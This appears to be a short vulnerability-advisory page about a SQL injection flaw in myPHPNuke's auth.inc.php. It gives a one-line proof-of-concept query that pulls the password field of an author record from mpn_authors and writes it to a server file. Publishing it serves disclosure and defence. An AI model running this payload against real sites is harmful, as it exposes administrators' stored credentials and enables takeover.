• info
• discussion
• exploit
• solution
• references

myPHPNuke auth.inc.php SQL Injection Vulnerability

The following proof of concept was provided:

select pwd from mpn_authors where aid='mad' into outfile '/filepath/file.txt'